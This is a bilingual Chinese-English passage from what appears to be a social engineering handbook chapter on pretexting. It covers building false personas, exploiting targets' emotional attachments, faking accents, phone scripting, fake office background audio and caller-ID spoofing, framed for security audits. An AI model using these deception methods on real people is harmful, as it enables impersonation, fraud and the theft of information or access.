Throughout this chapter I mentioned the power of pretexting. This is another topic that every social engineer, both malicious and professional, must master. But how can you ensure you accomplish this goal? To answer this you must learn about pretexting and understand exactly what it is, as discussed in Chapter 4.

 

第四章

Chapter 4

 

假装:如何成为任何人

Pretexting: How to Become Anyone

 

诚实是一段关系的关键。如果你能假装诚实,你就成功了。

Honesty is the key to a relationship. If you can fake that, you’re in.

 

—理查德·杰尼

—Richard Jeni

 

有时我们可能都希望自己能变成别人。哎呀,我真想变得更瘦一点,更漂亮一点。尽管医学界还没有发明出一种药丸来实现这一点,但解决这一困境的方法确实存在——它被称为借口

At times we probably all wish we could be someone else. Heck, I would love to be a little skinnier and better looking. Even though medical science hasn’t come up with a pill that can make that possible, a solution to this dilemma does exist—it’s called pretexting.

 

什么是借口?有些人说,借口只是你在社会工程活动中会讲的一个故事或谎言,但这个定义非常有限。借口更确切的定义是,构成你在社会工程审计中扮演的角色的背景故事、着装、打扮、个性和态度。借口包括你想象中的那个人的一切。借口越扎实,你作为社会工程师就越可信。通常,你的借口越简单,你就越成功。

What is pretexting? Some people say it is just a story or lie that you will act out during a social engineering engagement, but that definition is very limiting. Pretexting is better defined as the background story, dress, grooming, personality, and attitude that make up the character you will be for the social engineering audit. Pretexting encompasses everything you would imagine that person to be. The more solid the pretext, the more believable you will be as a social engineer. Often, the simpler your pretext, the better off you are.

 

借口,尤其是自互联网出现以来,被恶意利用的情况越来越多。我曾经看到一件 T 恤,上面写着:“互联网:男人是男人,女人是男人,孩子是等着抓捕你的 FBI 探员。”这句话虽然有点幽默,但很有道理。在互联网上,你可以成为任何你想成为的人。恶意黑客多年来一直在利用这种能力为自己谋利,而且不仅仅是在互联网上。

Pretexting, especially since the advent of the Internet, has seen an increase in malicious uses. I once saw a t-shirt that read, “The Internet: Where men are men, women are men, and children are FBI agents waiting to get you.” As slightly humorous as that saying is, it has a lot of truth in it. On the Internet you can be anyone you want to be. Malicious hackers have been using this ability to their advantage for years and not just with the Internet.

 

在社会工程中,扮演一个角色或扮演一个不同的人来成功实现目标往往是必不可少的。克里斯·哈德纳吉可能没有技术支持人员或大型进口组织的首席执行官那么有影响力。当出现社会工程情况时,拥有成为借口所需的技能很重要。在与世界知名的社会工程师克里斯·尼克森讨论这个话题时,他说了一些我认为非常有说服力的话。

In social engineering playing a role or being a different person to successfully accomplish the goal is often imperative. Chris Hadnagy might not have as much pull as the tech support guy or the CEO of a major importing organization. When a social engineering situation arises, having the skills needed to become the pretext is important. In a discussion I was having with world-renowned social engineer, Chris Nickerson, on this topic he said something I think really hits home.

 

尼克森表示,掩饰不是扮演一个角色或扮演一个角色。他说,掩饰不是生活在谎言中,而是真正成为那个人。你的每一根纤维都是你扮演的那个人。他走路的方式、说话的方式、肢体语言——你成为了那个人。我同意这种关于掩饰的哲学。通常,当人们看电影时,我们觉得“我们看过的最好的”电影是演员让我们如此着迷于他们的角色,以至于我们无法将他们与他们扮演的角色区分开来。

Nickerson stated that pretexting is not about acting out a role or playing a part. He said it is not about living a lie, but actually becoming that person. You are, in every fiber of your being, the person you are portraying. The way he walks, the way he talks, body language—you become that person. I agree with this philosophy on pretexting. Often when people watch a movie the ones we feel are the “best we have ever seen” are where the actors get us so enthralled with their parts we can’t separate them from their portrayed characters.

 

多年前,我和妻子看了一部布拉德·皮特主演的精彩电影《燃情岁月》 ,这对我来说就是事实。他在这部电影中扮演一个自私的混蛋,一个做出许多错误决定的饱受折磨的灵魂。他演这个角色太出色了,以至于我妻子恨他这个演员好几年。这是一个很好的借口。

This was proven true to me when many years ago my wife and I watched a great movie with Brad Pitt, Legends of the Fall. He was a selfish jerk in this movie, a tormented soul who made a lot of bad decisions. He was so good at playing this part my wife literally hated him as an actor for a few years. That is a good pretexter.

 

对于许多社会工程师来说,使用借口的问题在于,他们认为这只是装扮而已。诚然,装扮可以有所帮助,但借口是一门科学。在某种程度上,你的整个形象将以一种不同于你本人的方式展现你。要做到这一点,作为一名社会工程师,你必须清楚地了解借口的真正含义。然后,你可以制定计划并完美地执行借口。最后,你可以进行收尾工作。本章将介绍借口的这些方面。首先讨论借口的真正含义。接下来讨论如何作为一名社会工程师使用借口。最后,为了将所有内容联系在一起,本章探讨了一些展示如何有效使用借口的故事。

The problem with using pretexting for many social engineers is that they feel it is just dressing up as a part and that’s it. True, the dress can help, but pretexting is a science. In a way, your whole persona is going to portray you in a light that is different than who you are. To do this, you, as a social engineer, must have a clear picture of what pretexting really is. Then you can plan out and perform the pretext perfectly. Finally, you can apply the finishing touches. This chapter will cover those aspects of pretexting. First is a discussion of what pretexting really is. Following that is discussion of how to use pretexting as a social engineer. Finally, to tie it all together, this chapter explores some stories that show how to use pretexting effectively.

 

什么是借口?

What Is Pretexting?

 

借口是指创造虚构的场景,以说服目标受害者泄露信息或采取某些行动。这不仅仅是编造谎言;在某些情况下,它可以创造一个全新的身份,然后使用该身份操纵信息的接收。社会工程师可以使用借口冒充他们自己从未做过的某些工作和角色。借口并不是一劳永逸的解决方案。社会工程师在其职业生涯中必须想出许多不同的借口。所有这些借口都有一个共同点:研究。良好的信息收集技巧可以成就或毁掉一个好的借口。例如,如果您的目标不使用外部支持,模仿完美的技术支持代表是没用的。

Pretexting is defined as the act of creating an invented scenario to persuade a targeted victim to release information or perform some action. It is more than just creating a lie; in some cases it can be creating a whole new identity and then using that identity to manipulate the receipt of information. Social engineers can use pretexting to impersonate people in certain jobs and roles that they never themselves have done. Pretexting is not a one-size-fits-all solution. A social engineer must develop many different pretexts over his or her career. All of them will have one thing in common: research. Good information gathering techniques can make or break a good pretext. For example, mimicking the perfect tech support rep is useless if your target does not use outside support.

 

除了社会工程学,借口还用于其他生活领域。销售、公开演讲、所谓的算命师、神经语言程序设计 (NLP) 专家,甚至医生、律师、治疗师等都必须使用某种借口。他们都必须创造一种情景,让人们愿意透露他们通常不会透露的信息。使用借口的社会工程师和其他人的差别在于所涉及的目标。同样,社会工程师必须扮演这种角色一段时间,而不仅仅是扮演一个角色。

Pretexting is also used in areas of life other than social engineering. Sales; public speaking; so-called fortune tellers; neurolinguistic programming (NLP) experts; and even doctors, lawyers, therapists, and the like all have to use a form of pretexting. They all have to create a scenario where people are comfortable with releasing information they normally would not. The difference in social engineers using pretexting and others is the goals involved. A social engineer, again, must live that persona for a time, not just act a part.

 

只要审计或社会工程工作还在进行,你就需要保持角色的本色。我自己也会“进入角色”,我的许多同事也是如此,有些人甚至在“下班后”也保持角色的本色。无论何时何地,你都应该成为你设定的借口。此外,许多专业的社会工程师拥有许多不同的在线、社交媒体、电子邮件和其他账户,以支持一系列借口。

As long as the audit or social engineering gig lasts, you need to be in the persona. I “get in character” myself, as do many of my colleagues, some of whom even stay in character “off the clock.” Anywhere you need to, you should be the pretext you set out to be. In addition, many professional social engineers have many different online, social media, email, and other accounts to back up a slew of pretexts.

 

我曾就这个话题采访过电台偶像汤姆·米什克,这是我参与的一个社会工程播客节目(主办方为www.social-engineer.org/episode-002-pretexting-not-just-for-social-engineers/)。电台主持人必须精通伪装,因为他们必须不断向公众发布他们想要的信息。汤姆在这方面非常熟练,以至于许多听众都觉得他们“认识”他是朋友。他会收到婚礼、周年纪念甚至生日的邀请。汤姆是如何做到这种惊人的伪装的?

I once interviewed radio icon Tom Mischke on this topic for a social engineering podcast I am a part of (hosted at www.social-engineer.org/episode-002-pretexting-not-just-for-social-engineers/). Radio hosts must be proficient at pretexting because they constantly have to release only the information they want to the public. Tom was so proficient at this that many listeners felt as if they “knew” him as a friend. He would get invitations to weddings, anniversaries, and even births. How was Tom able to accomplish this amazing kind of pretext?

 

答案就是练习。他建议要进行大量的练习。他告诉我,他会先计划好自己的“行为”,然后进行练习——用他们说话的声音,坐他们坐的姿势,甚至穿他们穿的衣服。练习正是打造一个好借口的关键。

The answer is practice. Lots and lots of practice is what he prescribed. He told me that he would actually plan out his “acts” then practice them—use the voice they would have, sit how they would sit, maybe even dress like they would dress. Practice is exactly what makes a good pretext.

 

需要记住的一个非常重要的方面是,借口的质量与所收集信息的质量直接相关。信息越多、越好、越相关,借口就越容易被开发和成功。例如,如果你去一家有内部支持或外包给一两个人的小公司的公司,技术支持人员的经典借口就会完全失败。当你和别人交谈时,你自然而然地谈论你的真实身份,你的借口也应该很容易应用。

A very important aspect to remember is that the quality of the pretext is directly linked to the quality of the information gathered. The more, the better, and the more relevant the information the easier it will be for the pretext to be developed and be successful. For example, the classic pretext of a tech support guy would utterly fail if you went to a company that either had internal support or outsourced to a very small company of one or two people. As natural as you are when you converse with someone about who you really are is how easy applying your pretext should be.

 

为了让您了解如何利用这项技能,以下部分将介绍借口的原则,然后展示如何将它们应用于实际规划一个可靠的借口。

So that you can see how you can utilize this skill, the following section covers the principles of pretexting then shows how you can apply them to actually planning a solid pretext.

 

借口的原则和计划阶段

The Principles and Planning Stages of Pretexting

 

和所有技能一样,某些原则决定了执行该任务的步骤。借口也不例外。以下是您可以使用的借口原则列表。这些绝不是唯一的原则;也许可以添加其他原则,但这些原则体现了借口的本质:

As with every skill, certain principles dictate the steps to performing that task. Pretexting is no different. The following is a list of principles of pretexting that you can use. By no means are these the only principles out there; maybe others can be added, but these principles embody the essence of pretexting:

 
 
     
  • 做的研究越多,成功的机会就越大。
  • The more research you do the better the chance of success.
  •  
     
  • 融入你自己的个人兴趣将会增加成功率。
  • Involving your own personal interests will increase success.
  •  
     
  • 练习方言或表达。
  • Practice dialects or expressions.
  •  
     
  • 很多时候,如果人们认为手机不那么重要,社会工程学的努力就会减少。但作为一名社会工程师,使用手机不应该减少社会工程学工作所付出的努力。
  • Many times social engineering effort can be reduced if the phone is viewed as less important. But as a social engineer, using the phone should not reduce the effort put into the social engineering gig.
  •  
     
  • 借口越简单,成功的机会就越大。
  • The simpler the pretext the better the chance of success.
  •  
     
  • 借口应该显得自发。
  • The pretext should appear spontaneous.
  •  
     
  • 为目标提供合理的结论或后续行动。
  • Provide a logical conclusion or follow through for the target.
  •  
 

以下各节将详细讨论每个原则。

The following sections discuss each of these principles in detail.

 

研究得越多,成功的机会就越大

The More Research You Do, the Better the Chance of Success

 

这个原则是不言自明的,但再怎么强调也不为过——成功程度与研究的水平和深度直接相关。如第 2 章所述,这是成功社会工程的关键。社会工程师掌握的信息越多,他或她就越有可能编造出行之有效的借口。还记得我在第 2 章中讲述的关于我的导师 Mati Aharoni 的故事吗?他如何说服一位高管访问他的在线“集邮”网站?乍一看,该公司内部的路径似乎与金融、银行、筹款或类似的东西有关,因为它是一个银行设施。Mati 做的研究越多,他就越清楚,借口可能是一个出售集邮的人。了解了这位高管的兴趣后,Mati 找到了一条进入公司的简单途径,而且成功了。

This principle is self-explanatory, but it can’t be said enough—the level of success is directly connected to the level and depth of research. As discussed in Chapter 2, it is the crux of successful social engineering. The more information a social engineer holds the more chances he or she has of developing a pretext that works. Remember the story I told in Chapter 2 about my mentor Mati Aharoni and how he convinced a high-level executive to visit his “stamp collection” site online? At first glance, the path inside that company might have seemed to be something to do with financial, banking, fund raising, or something along those lines because it was a banking facility. The more research Mati did, the clearer it became that the pretext could be a person who was selling a stamp collection. Finding out what the executive’s interests were allowed Mati to find an easy way into the company, and it worked.

 

有时,这些小细节才是关键。记住,没有信息是无关紧要的。在收集信息时,寻找故事、物品或个人方面也是一个好主意。利用目标的个人或情感依恋可以让你获得机会。如果社会工程师发现首席财务官每年向儿童癌症研究中心捐赠一大笔钱,那么一个涉及为此事业筹款的借口很可能奏效,尽管听起来很无情。

Sometimes those little details that are what make the difference. Remember, no information is irrelevant. While gathering information, looking for stories, items, or aspects of a personal nature is also a good idea. Using a target’s personal or emotional attachments can enable you to get a foot in the door. If the social engineer finds out that every year the CFO donates a sizable sum to a children’s cancer research center, then a pretext that involves fund raising for this cause could very likely work, as heartless as it sounds.

 

问题在于,恶意的社会工程师会不假思索地利用情绪作为借口。2001 年 9 月 11 日纽约双子塔遭受袭击后,许多恶意黑客和社会工程师利用这些人的损失为自己筹集资金,通过针对人们电脑的网站和电子邮件以及假冒筹款人从那些心怀善意的人那里获得资金。2010 年智利和海地发生地震后,同样的事情发生了,许多恶意的社会工程师开发了网站,声称提供有关地震活动或遇难者的信息。这些网站被编码了恶意代码,并入侵了人们的电脑。

The problem is that malicious social engineers use pretexts that feed on emotions without a second thought. After the attacks on the Twin Towers in New York City on September 11, 2001, many malicious hackers and social engineers used the losses of these people to raise funds for themselves via websites and emails that targeted people’s computers and fake fund raisers that obtained funds from those with a giving heart. After the earthquakes in Chile and Haiti in 2010, the same things occurred where many malicious social engineers developed websites that were positioned as giving out information on the seismic activity or the people who were lost. These sites were encoded with malicious code and hacked people’s computers.

 

在电影或音乐明星去世后,这种现象更加明显。搜索引擎优化 (SEO) 和营销天才会在几个小时内让搜索引擎收录他们的故事。恶意的社会工程师和营销人员会利用搜索引擎关注度的提高,推出利用 SEO 的恶意网站。他们会将人们吸引到这些网站,收集信息或用病毒感染他们。

This is even more evident directly after the death of a movie or music star. Search engine optimization (SEO) and marketing geniuses will have the search engines pulling up their stories in a matter of hours. Along with marketers, malicious social engineers will take advantage of the increased search engine attention by launching malicious sites that feed off that SEO. Drawing people to these sites, they harvest information or infect them with viruses.

 

人们会利用他人的不幸,这是这个世界的一个可悲事实,也是我说过你会在这本书中发现的黑暗角落之一。作为一名社会工程审计员,我可以利用员工的情绪向公司表明,即使是看似善意的人也会欺骗公司员工,让他们获得有价值且会毁掉业务的数据。

That people will take advantage of others’ misfortune is a sad fact about this world, and one of those dark corners I said you would visit in this book. As a social engineering auditor, I can use an employee’s emotions to show a company that even people with seemingly good intentions can trick a company’s employees into giving access to valuable and business-ruining data.

 

所有这些例子都证实了这一观点:社会工程师的信息收集和研究过程越好,他就越有机会找到一些细节,从而增加成功借口的机会。

All these examples solidify the point that the better a social engineer’s information-gathering and research-gathering process, the better chance he has at finding some detail that will increase the chances of a successful pretext.

 

融入个人兴趣以增加成功率

Involve Personal Interests to Increase Success

 

利用自己的个人兴趣来增加社交工程行动成功的机会似乎很简单,但它可以在很大程度上说服目标相信你是可信的。没有什么比一个自称对某个话题很了解却又做不到的人更能破坏融洽的关系和信任了。作为一名社交工程师,如果你以前从未见过服务器机房,也从未拆过电脑,那么试图扮演技术人员的角色可能会很快导致失败。在你的借口中加入你感兴趣的话题和活动会让你有很多话可说,让你能够表现出智慧和自信。

Using your own personal interests to increase the chances of a successful social engineering move seems very simple but it can go a long way in convincing the target that you are credible. Nothing can ruin rapport and trust faster than a person who claims to be knowledgeable about a topic and then falls short. As a social engineer, if you have never seen a server room before and have never taken a computer apart, trying to play the part of a technician can be a quick path to failure. Including topics and activities in your pretext that you are interested in gives you a lot to talk about and gives you the ability to portray intelligence as well as confidence.

 

自信可以在很大程度上说服目标相信你就是你说的那个人。某些借口需要比其他借口更多的知识(例如,集邮者与核研究人员)才能令人信服,因此研究再次成为反复出现的主题。有时借口很简单,你可以通过阅读一些网站或一本书来获得知识。

Confidence can go a long way toward convincing the target you are who you say you are. Certain pretexts require more knowledge than others (for instance, stamp collector versus nuclear researcher) to be convincing, so again research becomes the recurring theme. Sometimes the pretext is simple enough that you can get the knowledge by reading a few websites or a book.

 

不管你如何获得知识,作为一名社会工程师,研究你个人感兴趣的话题是很重要的。在你了解了某个故事、方面、服务或兴趣,或者至少觉得可以讨论时,看看这个角度是否可行。

However you gain the knowledge, researching topics that personally interest you, as the social engineer, is important. After you pick up on a story, aspect, service, or interest that you have a lot of knowledge in or at least feel comfortable discussing, see whether that angle can work.

 

Tom G. Stevens 博士说:“重要的是要记住,自信总是与任务和情况有关。在不同情况下,我们的自信程度也不同。”这句话非常重要,因为自信直接关系到别人如何看待你作为社交工程师。自信(只要不是过度自信)可以建立信任和融洽的关系,让人们感到安心。找到一条通往目标的道路非常重要,这条道路可以让你有机会谈论你熟悉的话题,你可以自信地谈论这些话题。

Dr. Tom G. Stevens, PhD, says, “It is important to remember that self-confidence is always relative to the task and situation. We have different levels of confidence in different situations.” This statement is very important, because confidence directly links to how others view you as a social engineer. Confidence (as long as it is not overconfidence) builds trust and rapport and makes people feel at ease. Finding a path to your target that offers you the chance to talk about topics you are comfortable with, and that you can speak about with confidence, is very important.

 

1957 年,心理学家 Leon Festinger 提出了认知失调理论。该理论指出,人们倾向于寻求信仰、观点以及基本上所有认知之间的一致性。当态度和行为之间存在不一致时,必须做出一些改变来消除失调。Festinger 博士指出,有两个因素会影响失调的强度:

In 1957 psychologist Leon Festinger came up with the theory of cognitive dissonance. This theory states that people have a tendency to seek consistency among their beliefs, opinions, and basically all their cognitions. When an inconsistency exists between attitudes and behaviors, something must change to eliminate the dissonance. Dr. Festinger states two factors affect the strength of the dissonance:

 
 
     
  • 不一致信念的数量
  • The number of dissonant beliefs
  •  
     
  • 每个信仰的重要性
  • The importance of each belief
  •  
 

然后他指出,有三种方法可以消除不和谐(这应该会引起每个社会工程师的注意):

He then stated that three ways exist to eliminate dissonance (which should cause every social engineer’s ears to perk up):

 
 
     
  • 降低不协调信念的重要性。
  • Reduce the importance of the dissonant beliefs.
  •  
     
  • 添加更多一致的信念,以抵消不一致的信念。
  • Add more consonant beliefs that outweigh the dissonant ones.
  •  
     
  • 改变不和谐的信念,使它们不再不一致。
  • Change the dissonant beliefs so they are no longer inconsistent.
  •  
 

社会工程师如何使用这些信息?当你的借口表明你应该充满信心时,如果你缺乏信心地接近借口,就会自动产生不和谐。这种不和谐会发出各种危险信号,并为建立融洽关系、信任和前进设置障碍。这些障碍会影响目标的行为,然后目标需要平衡她的不和谐感,并扼杀你的借口奏效的任何可能性。

How does a social engineer use this information? Approaching a pretext with lack of confidence when your pretext says that you should be confident automatically creates dissonance. This dissonance raises all sorts of red flags and puts barriers up to rapport, trust, and forward motion. These barriers affect the target’s behavior, who is then expected to balance out her feelings of dissonance, and kills any likelihood of your pretext working.

 

应对这种情况的方法之一是增加更多一致的信念,使它们压倒不一致的信念。目标对你的借口有什么期望?了解这一点将使你能够用行动、言语和态度来滋养他们的思想和情感,从而建立信仰体系并压倒任何可能带来怀疑的信念。

One of the methods to counter that is to add more consonant beliefs so that they outweigh the dissonant ones. What would the target expect of your pretext? Knowing that will allow you to feed their minds and emotions with actions, words, and attitudes that will build the belief system and outweigh any beliefs that might bring in doubt.

 

当然,一名熟练的社会工程师也能改变不和谐的信念,使它们不再不一致。尽管这比较棘手,但却是一项很强大的技能。您的外表可能并不符合目标对象对您的借口的设想。您可能会回想起电视剧《天才医生》。杜奇的问题是,由于他太年轻,他作为顶尖医生的“借口”从来都不符合要求。那是一个不和谐的信念,但他的知识和行动往往会将其带入“目标”的一致信念中。与前面的例子一样,社会工程师可以通过目标对象的态度、行为,尤其是他们对借口的了解,使他的借口与目标对象的信念保持一致。

Of course, a skilled social engineer can also change the dissonant beliefs so they are no longer inconsistent. Although this is trickier, it is a powerful skill to have. It is possible that your appearance does not fit what the target might envision for your pretext. You might think back to the show Doogie Howser, M.D. Doogie’s problem was that his “pretext” of being a top doctor never fit since he was so young. That was a dissonant belief, but his knowledge and actions often brought that into the consonant beliefs of his “targets.” Just like the previous example, a social engineer can align his pretext with the target’s beliefs by their attitudes, actions, and especially their knowledge of the pretext.

 

我最近在现实生活中看到的一个例子是在 Defcon 18 上。我是将社会工程学 CTF 带到 Defcon 的团队的一员。我们看到许多参赛者都以内部员工为借口。当被问到“你的员工徽章号码是多少?”这样的反对意见时,不熟练的社会工程师会感到紧张,要么无法回答,要么挂断电话,而熟练的社会工程师会将这些不一致的信念与目标保持一致。只需说出他们在网上找到的徽章号码或使用其他方法,他们就能说服目标不需要这些信息,从而使目标与他们的想法保持一致。

One example of this I recently saw in real life was at Defcon 18. I was part of the team that brought the Social Engineering CTF to Defcon. We saw many contestants who used the pretext of an internal employee. When presented with an objection like, “What is your employee badge number?” an unskilled social engineer would get nervous and either not have an answer or hang up, whereas a skilled social engineer would bring those dissonant beliefs into alignment for the target. Simply stating a badge number they found online or using another method they were able to convince the target that information was not needed, therefore aligning the target to their beliefs.

 

这些观点是对一个非常简单的问题的非常技术性的回答,但你必须明白,一个人只能做有限的伪装。明智地选择你的道路。

These points are very technical answers to a very simple problem, but you must understand that one can do only so much faking. Choose your path wisely.

 

练习方言或表达方式

Practice Dialects or Expressions

 

学习说一种不同的方言并非一蹴而就。根据您居住的地方,学习说一种不同的方言或带有口音可能需要一些时间。模仿南方口音或亚洲口音可能非常困难,甚至不可能。有一次我参加了一个国际销售组织的培训班,那里有一些统计数据,说 70% 的美国人喜欢听英国口音的人说话。我不确定这个统计数据是否属实,但我可以说我自己喜欢这种口音。现在,在那节课之后,我听到班上不少人练习他们的“cheerios”和“Alo Govenors”,这很糟糕。我有一个来自英国的好朋友乔恩,当他听到美国人试图用英国口音模仿玛丽·波平斯的台词时,他会非常生气。如果他听到这个群体,他可能会发怒。

Learning to speak in a different dialect cannot be glanced over quickly. Depending on where you live, learning to speak a different dialect or with an accent can take some time. Putting on a southern drawl or an Asian accent can be very difficult, if not impossible. Once I was in a training class with an international sales organization and it had some statistics that said 70% of Americans prefer to listen to people with a British accent. I am not sure if that statistic is true or not, but I can say that I enjoy the accent myself. Now after that class, I heard quite a few people in the class practice their “cheerios” and “Alo Govenors,” which were horrible. I have a good friend from the UK, Jon, who gets very angry when he hears Americans trying to use lines from Mary Poppins in an imitation British accent. If he had heard this group, he might have blown a fuse.

 

那门课让我明白,尽管统计数据可能表明一种口音更有利于销售,或者仅仅因为你可能在南方或欧洲进行社会工程,并不意味着你可以轻易模仿这种口音让自己看起来像是当地人。当你有疑问时,就抛弃它。如果你不能把方言说得完美无缺,如果你不能说得自然,如果你不能说得流畅,那就不要尝试。演员们会通过发声教练和训练课程来学习如何用他们想要扮演的口音清楚地说话。演员克里斯蒂安·贝尔来自威尔士,但仅从听他说话就确定这一点非常困难。在他的大多数电影中,他听起来都不像英国人。演员格温妮丝·帕特洛在电影《莎翁情史》中模仿了一种非常令人信服的英国口音

What that class taught me was that although the stats might say one accent is better than another for sales or just because you may be social engineering in the south or in Europe doesn’t mean you can easily put on the accent to make you appear local. When in doubt, throw it out. If you can’t make the dialect perfect, if you can’t be natural, and if you can’t be smooth, then just don’t try. Actors use vocal coaches and training sessions to learn to speak clearly in the accent they have to portray. Actor Christian Bale is from Wales, but determining that fact from listening to him is very difficult. He doesn’t sound British in most of his movies. Actor Gwyneth Paltrow took on a very convincing British accent for the movie Shakespeare in Love.

 

大多数演员都有方言教练,他们会指导演员完善目标口音。由于大多数社会工程师负担不起方言教练,因此有许多出版物可以帮助您学习至少是模仿口音的基本知识,例如Evangeline Machlin 的《舞台方言》。虽然这是一本较旧的书,但其中包含许多很棒的提示:

Most actors have dialect coaches who will work with them to perfect the target accent. Because most social engineers cannot afford a dialect coach, there are many publications that can help you learn at least the basics of putting on an accent, such as Dialects for the Stage by Evangeline Machlin. Although this is an older book, it contains a lot of great tips:

 
 
     
  • 找到你想学的口音的母语例子来听。像《舞台方言》这样的书通常附带有大量口音的录音带供你收听。
  • Find native examples of the accent you want to learn, to listen to. Books like Dialects for the Stage often come with audiotapes full of accents to listen to.
  •  
     
  • 尝试跟着录音说话,练习听起来像那个人。
  • Try speaking along with the recording you have, to practice sounding like that person.
  •  
     
  • 等你觉得比较有信心之后,就把自己用这种口音说话的声音录下来,这样以后就可以听并纠正错误。
  • After you feel somewhat confident, record yourself speaking in that accent so you can listen to it later on and correct errors.
  •  
     
  • 创建一个场景并与伙伴一起练习你的新口音。
  • Create a scenario and practice your new accent with a partner.
  •  
     
  • 在公共场合使用你的口音,看看人们是否相信。
  • Apply your accent in public to see if people find it believable.
  •  
 

方言和口音多种多样,我个人觉得把要说的句子的发音写出来很有帮助。这样我就可以练习阅读,把想法牢牢记在脑子里,让我的口音更自然。

There are innumerable dialects and accents, and I personally find it helpful to write out phonetically some of the sentences I will speak. This enables me to practice reading them and get the ideas sunk into my brain to make my accent more natural.

 

这些技巧可以帮助社会工程师掌握或者至少熟练使用另一种方言。

These tips can help a social engineer master or at least become proficient at using another dialect.

 

即使你无法掌握另一种方言,学习你所在地区使用的表达方式也会有所不同。一个想法是花一些时间在公共场合听人们互相交谈。一个好地方是餐馆或购物中心,或者任何你可能会发现一群人坐着聊天的地方。仔细听短语或关键词。如果你听到它们在几次对话中使用,你可能想找到一种方法将它们融入到你的借口中以增加可信度。同样,这个练习需要研究和实践。

Even if you cannot master another dialect, learning expressions that are used in the area in which you are working can make a difference. One idea is to spend some time listening to people in public talk to one another. A great place for this is a diner or a shopping mall, or any place you might find groups of people sitting and chatting. Listen closely to phrases or key words. If you hear them used in a few conversations you might want to find a way to incorporate these into your pretext to add believability. Again, this exercise takes research and practice.

 

使用手机不应该减少社会工程师的努力

Using the Phone Should Not Reduce the Effort for the Social Engineer

 

近年来,互联网逐渐主导了社会工程学某些较为“非人性化”的方面,而在过去,手机是社会工程学不可或缺的一部分。由于这种转变,许多社会工程师不再将精力或努力投入到手机使用上,而手机使用可以真正使社会工程学取得成功。

In recent years, the Internet has come to dominate certain more “impersonal” aspects of social engineering, whereas in days past the phone was an integral part of social engineering. Because of this shift, many social engineers do not put the energy or effort into phone usage that can make it truly successful.

 

本主题旨在表明,手机仍然是社会工程师最强大的工具之一,并且由于互联网的非个人性质,使用手机的努力不应减少。

This topic is here to show that the phone is still one of the most powerful tools of the social engineer and the effort put into using it should not be diminished due to the impersonal nature of the Internet.

 

有时,当社会工程师计划进行电话攻击时,他的想法可能会有所不同,因为使用互联网似乎更容易。请注意,您应该计划在基于电话的社会工程攻击中投入相同程度的努力、相同程度和深度的研究和信息收集,最重要的是,相同程度的实践。我曾经和一个小团队一起练习电话演示。我们概述了正确的方法、语气、速度、音调和要使用的词语。我们概述了一个脚本(稍后会详细介绍),然后启动了一个会话。第一个人打了电话,和某人通了电话,把前几行说错了。出于完全的尴尬和恐惧,他挂断了电话。这是一个很好的教训——电话另一端的人不知道你要说什么,所以你不能真的“搞砸”。练习可以帮助你学习如何处理由于你不小心更改了脚本中的某些内容而导致的“未知数”,这些内容会让你偏离基础。

Sometimes when a social engineer plans a phone attack his thinking may differ because using the Internet might appear easier. Note that you should plan to put the same level of effort, the same level and depth of research and information gathering, and most importantly the same level of practice into your phone-based social engineering attacks. I was once with a small group that was going to practice phone presentations. We outlined the proper methods, the tone, the speed, the pitches, and the words to use. We outlined a script (more on this in a minute) and then launched a session. The first person made the call, got on the phone with someone, and messed up the first few lines. Out of complete embarrassment and fear he just hung up on the person. There is a very good lesson there—the person on the other end of the phone has no clue what you are going to say, so you can’t really “mess up.” Practice sessions can help you learn how to handle the “unknowns” caused by your accidentally altering something in your script that throws you off base.

 

如果你没有幸运地找到一个可以一起练习或磨练这些技能的团队,你就必须发挥创造力。试着打电话给家人或朋友,看看你能在多大程度上操纵他们。另一种练习方法是像打电话一样录下自己的声音,然后稍后再播放,听听你的声音。

If you are not as fortunate to have a group to practice or hone these skills with, you will have to get creative. Try calling family or friends to see how far you can get manipulating them. Another way to practice is to record yourself as if you were on the phone and then play it back later to hear how you sound.

 

我个人认为使用大纲脚本非常重要。举个例子:假设你不得不打电话给电话公司或其他公用事业公司。也许他们搞错了账单,或者你遇到了其他服务问题,而你打算投诉。在你向客服人员解释自己,告诉她你有多沮丧和失望之后,客服人员却没有为你做任何事情,她说:“XY&Z 致力于提供优质服务;我今天回答了你所有的问题吗?”如果电话后面的那个人花一秒钟思考她问的问题,她就会意识到这有多愚蠢,对吧?这就是你使用书面脚本而不是大纲时会发生的情况。大纲让你在对话中拥有“创作艺术自由”,而不必担心接下来发生什么。

I personally feel that using an outlined script is very important. Here is an illustration: suppose you had to call your phone company or another utility. Maybe they messed up a bill or you had another service problem and you are going to complain. After you explain yourself to the rep, telling her how upset and disappointed you are, and the rep does absolutely nothing for you, she says something like, “XY&Z is committed to excellent service; have I answered all your questions today?” If the drone behind the phone thought for one second about what she was asking she would realize how silly it is, right? This is what happens when you use a written-out script instead of an outline. An outline allows you “creative artistic freedom” to move around in the conversation and not be so worried about what must come next.

 

使用电话巩固你的借口是进入目标的最快方法之一。电话允许社会工程师“欺骗”或伪造几乎任何东西。考虑这个例子:如果我想打电话给你并假装我在一个繁忙的办公室来增加我试图使用的借口,我可以从 Thriving Office ( www.thrivingoffice.com/ ) 获取音轨。该网站提供一个名为“Busy”的曲目和另一个名为“Very Busy”的曲目。创作者说: “这张有价值的 CD 充满了人们期望从知名公司听到的声音,可以立即获得可信度。它简单、有效且有保证!”

Using the phone to solidify your pretext is one of the quickest methods inside your target’s door. The phone allows the social engineer to “spoof,” or fake, almost anything. Take into consideration this example: If I wanted to call you and pretend I was in a bustling office to add to the pretext I was trying to use, I could simply grab the audio track from Thriving Office (www.thrivingoffice.com/). This site offers a track called “Busy” and another called “Very Busy.” From the creators: “This valuable CD, which is filled with the sounds people expect to hear from an established company, provides instant credibility. It’s simple, effective, and guaranteed!”

 

仅这句话就充满了社会工程学的善意——充满了人们期望从一家知名公司听到的话。您已经可以看到,CD 旨在满足期望并提供可信度(至少在目标的心中,在他的期望得到满足之后),从而自动建立信任。

That sentence alone is filled with social engineering goodness—filled with what people expect to hear from an established company. Already you can see that the CD is geared to fill expectations and provide credibility (at least, in the target’s mind, after his expectations are met), thereby automatically building trust.

 

此外,伪造来电显示信息相对简单。像 SpoofCard ( www.spoofcard.com ) 这样的服务或使用自主开发的解决方案,可以让社会工程师告诉目标你是从公司总部、白宫或当地银行打来的。利用这些服务,你可以将号码伪造为来自世界任何地方。

In addition, spoofing caller ID information is relatively simple. Services like SpoofCard (www.spoofcard.com) or using homegrown solutions, allows a social engineer to tell the target you are calling from a corporate headquarters, the White House, or the local bank. With these services you can spoof the number to be coming from anywhere in the world.

 

